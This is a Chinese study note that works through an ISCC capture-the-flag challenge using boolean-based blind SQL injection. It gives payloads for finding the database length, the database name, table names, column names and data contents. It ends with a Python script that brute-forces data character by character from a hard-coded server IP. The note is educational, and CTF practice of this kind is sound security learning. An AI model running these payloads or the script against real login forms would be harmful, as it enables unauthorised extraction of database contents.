基于布尔盲注的学习笔记

参考链接:https://blog.csdn.net/squeen_/article/details/52767887

这里引用的是iscc的一道sql盲注题

Iscc web Sqli

一道比较简单的布尔盲注题

• 首先找到注入点,测试是否为布尔盲注:
  

admin'  // 返回账号密码错误<br>
admin' and 1 =1# //返回normal user: admin' and 1 =1#

密码随意

多次测试就两种结果，账号密码错误和normal user,可以推断这是一个布尔盲注题

布尔盲注步骤

这里详细讲下盲注语句步骤:

一、得到数据库的长度

admin' and length(database())>1# //长度为13

二、得到数据库的名称

admin' and ascii(substr(database(),1,1))>1# // sqli_database

这个和后面都要用脚本跑一下，脚本会在后面放出

三、得到表名

admin' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>1# //news,user

四、得到字段名

admin' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='news'),1,1))>1#

五、得到字段的内容

admin' and ascii(substr((select group_concat(kjafuibafuohnuvwnruniguankacbh) from sqli_database.news),1,1))>1#

python脚本获取

import requests

url = 'http://118.190.152.202:8011/'

def test(num,asc):
	# data = {'username': 'admin\' and ascii(substr(database(),%s,1))>%s#'%(num,asc),'password':'111'} //sqli_database
    # data = {'username': 'admin\' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%s,1))>%s#'%(num,asc),'password':'111'}//news,user
    # data = {'username': 'admin\' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=\'news\'),%s,1))>%s#'%(num,asc),'password':'111'}//
	data = {'username': 'admin\' and ascii(substr((select group_concat(kjafuibafuohnuvwnruniguankacbh) from sqli_database.news ),%s,1))>%s#'%(num,asc),'password':'111'}
	r = requests.post(url,data=data)
	if 'normal' in r.text:
		return 1
	else:
		return 0

flag = ''
for num in range(0,100):
	for asc in range(0,255):
		get = test(num,asc)
		if get == 0:
			flag += chr(asc)
			print(flag)
			break